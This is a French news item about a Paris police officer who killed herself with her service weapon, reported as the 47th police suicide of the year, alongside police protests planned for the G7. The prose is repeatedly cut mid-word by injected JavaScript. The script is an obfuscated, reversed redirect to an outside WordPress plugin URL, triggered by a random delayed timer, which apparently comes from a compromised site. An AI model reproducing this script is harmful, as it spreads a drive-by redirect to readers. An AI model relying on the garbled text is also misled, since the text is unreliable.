FAITS DIVERSFRANCE

France: Une policière de la préfecture de police de Paris se suicide avec son arme de service

Une policière de la préfecture de police de Paris s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la mort ce jeudi. Il s’agit du 47e suicide dans la police depuis le début de l’année.

Une policière affectée à la Direction de l’ordre public et de la circulation à la préfecture de police de Paris s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la mort ce jeudi. La fonctionnaire a été retrouvée morte dans son véhicule garé sur un parking à Drancy, en Seine-Saint-Denis. Selon les premiers éléments, la policière s’est suicidée avec son arme de service.

Il s’agit du 47e suicide dans la police depuis le début de l’année. Le 28 juillet dernier, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile-1738720.html”>un policier du commissariat d’Aulnay-sous-Bois, en Seine-Saint-Denis, s’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la mort à son toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile avec son arme de service. Quatre jours plus tôt, c’est un officier de l’antenne de la police judiciaire de Cergy-Pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toise, dans le Val-d’Oise, qui s’est tué à l’hôtel de police.

Ultra mobilisés depuis le début du mouvement des gilets jaunes, dénonçant leurs conditions de travail, les cycles horaires inadaptés, les policiers organisent un “barbecue de la colère” vendredi près de Biarritz à l’occasion du sommet du G7. Une marche blanche sera également organisée à la rentrée au mois de septembre.

Source: BFMTV

%d blogueurs aiment cette page :